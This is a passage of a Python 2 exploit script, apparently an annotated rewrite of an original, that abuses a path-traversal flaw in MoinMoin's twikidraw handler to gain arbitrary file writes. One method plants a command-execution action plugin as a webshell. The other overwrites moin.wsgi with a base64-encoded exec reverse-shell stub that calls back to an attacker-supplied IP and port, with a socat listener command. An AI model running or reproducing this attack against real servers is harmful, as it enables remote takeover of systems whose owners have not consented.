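# --- Stage: turn a twikidraw "ticket" into an arbitrary file write ---
#
# Both methods abuse the same primitive visible in the URLs below: the
# twikidraw handler takes a `target` parameter containing "../" segments and
# uses it as the save path, so a "drawing" upload can be written outside the
# page's attachment directory (wherever the wiki process may write).
#   method '1': write a new action plugin (plugin/action/moinexec.py); the
#               script expects it to be reachable as `?action=moinexec` once
#               Apache reloads the code.
#   method '2': overwrite moin.wsgi with a reverse-shell stub, then request
#               an arbitrary action so the rewritten entry point is executed.
# Names defined earlier in the script and used here: method, target, jar,
# filename, data.  `jar` is sent on every request, so this stage presumably
# needs whatever session the earlier stage established -- confirm.
# Everything goes over plain http:// exactly as the original did.

# One traversal path per method.  The same relative path is used for the
# do=modify (ticket) and do=save (write) requests: the ticket is obtained for
# that target, so the two must match.
TRAVERSAL = {
    '1': "../../../plugin/action/moinexec.py",
    '2': "../../../../moin.wsgi",
}
# Fixed multipart boundary, as in the original.  Caveat: if the uploaded
# content ever contained this string the body would be cut short server-side.
BOUNDARY = "89692781418184"


def _twikidraw_save(path, ticket_hash, content):
    """POST `content` to the twikidraw save handler so it is written to `path`.

    Builds the multipart/form-data body by hand (fixed boundary, CRLF joins),
    byte-for-byte as the original did: a `filename` field carrying the
    page-level name, then a `filepath` file part posing as a PNG drawing whose
    bytes are `content`.  `ticket_hash` is the value extracted from the
    do=modify response.  Returns the requests.Response unchanged; callers
    treat an empty body as success because that is all the handler signals.
    """
    url = "http://%s/WikiSandBox?action=twikidraw&do=save&ticket=%s&target=%s" % (target, ticket_hash, path)
    parts = [
        "\r\n--" + BOUNDARY,
        "Content-Disposition: form-data; name=\"filename\"\r\n\r\n%s" % (filename),
        "--" + BOUNDARY,
        "Content-Disposition: form-data; name=\"filepath\"; filename=\"drawing.png\"",
        "Content-Type: image/png\r\n",
        content,
        "--" + BOUNDARY + "--",
    ]
    headers = {'Content-Type': 'multipart/form-data; boundary=' + BOUNDARY}
    return requests.post(url, cookies=jar, data="\r\n".join(parts), headers=headers)


# The original only handled '1' and '2' and would otherwise hit a NameError on
# `ticket` below; fail with a message instead.
if method not in TRAVERSAL:
    print "[-] \x1b[0;31mUnknown method '%s' (expected '1' or '2')\x1b[0m" % method
    exit()
traversal = TRAVERSAL[method]

print "[*] Obtaining ticket credentials to write backdoor.."
# do=modify for the traversal target returns a page that embeds a ticket bound
# to that target; do=save refuses writes without it.
ticket = requests.get("http://%s/WikiSandBox?action=twikidraw&do=modify&target=%s" % (target, traversal), cookies=jar)
m = re.search(r'ticket=(.*?)&target', ticket.text)
if m is None:
    # The original wrapped m.group(1) in a bare `except:`; the only failure
    # mode there is "no match", so test for it explicitly.
    print "[-] \x1b[0;31mFailed to extract ticket hash from MoinMoin!\x1b[0m"
    exit()
ticket_hash = m.group(1)
print "[+] Extracted ticket hash from MoinMoin: %s" % (ticket_hash)

print "[*] Sending payload.."
if method == '1':
    # `data` is sent verbatim as the plugin source; its contents are not
    # visible in this part of the script.
    r = _twikidraw_save(traversal, ticket_hash, data)
    # An empty response body is the only success signal the handler gives.
    if r.text == "":
        print "[+] Exploit completed"
        print "[*] Upon Apache restart, your shell will be available at:"
        print "http://%s/WikiSandBox?action=moinexec&c=[command]" % target
    else:
        print "[-] \x1b[0;31mExploit failed\x1b[0m"
else:  # method == '2'
    print "[*] Backconnect options:"
    ip = raw_input("[*] IP? ")
    port = raw_input("[*] Port? ")
    print "[*] To recieve your shell, login to %s and run: socat file:`tty`,raw,echo=0 tcp4-listen:%s" % (ip,port)
    raw_input("[*] Press enter to continue ")
    # Fill the [IP]/[PORT] placeholders in the `data` template, base64-encode
    # it onto a single line, and wrap it in a Python 2 `exec` statement.  The
    # [MARK] delimiters are kept as the original wrote them; what consumes
    # them (if anything) is not visible from here.
    payload = "[MARK]exec \"%s\".decode(\"base64\")[MARK]\n" % data.replace("[IP]",ip).replace("[PORT]",port).encode("base64").replace("\n","")
    r = _twikidraw_save(traversal, ticket_hash, payload)
    if r.text == "":
        print "[+] Payload file written"
    else:
        print "[-] \x1b[0;31mExploit failed\x1b[0m"
        exit()
    print "[*] Sending reverse shell"
    # Any request that goes through the (now overwritten) moin.wsgi should run
    # the stub; AttachFile is just a convenient action to hit.  A server error
    # or traceback in the response means the stub did not load cleanly.
    result = requests.get("http://%s/WikiSandBox?action=AttachFile" % target, cookies=jar).text
    if "Internal Server Error" in result or "Traceback" in result:
        print "[-] \x1b[0;31mSHIT\x1b[0m"
    else:
        print "[+] Shell sent successfully"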
# American: How the fuck did you get in here?
# Lone Man: I used my imagination.